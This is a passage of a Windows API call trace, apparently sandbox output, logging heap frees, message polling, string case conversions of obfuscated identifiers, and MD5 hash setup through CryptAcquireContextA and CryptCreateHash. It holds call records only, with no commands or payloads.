HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0154.015] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0154.015] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0154.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.016] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0154.016] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0154.016] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0154.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0154.016] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0154.017] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.017] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.017] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0154.017] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0154.017] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0154.017] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0154.018] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0154.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0154.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0154.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0154.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.018] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0154.018] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.018] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.018] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.018] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0154.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0154.018] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.018] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.018] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0154.018] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.018] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0154.018] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0154.018] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0154.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0154.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0154.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7140, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0154.019] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9beab0) returned 1 [0154.019] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.019] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.019] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0154.020] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.020] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0154.020] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.020] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0154.020] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.020] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0154.020] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.020] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0154.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.020] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0154.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.021] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0154.021] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.021] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0154.021] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.021] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.021] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.021] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.021] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.021] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0154.021] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.021] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0154.021] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.022] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.022] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.022] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0154.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.022] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0154.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.022] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0154.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaaba0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0154.022] CryptCreateHash (in: hProv=0x9beab0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0154.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0154.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72778, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0154.022] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0154.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0154.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0154.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.023] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.023] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 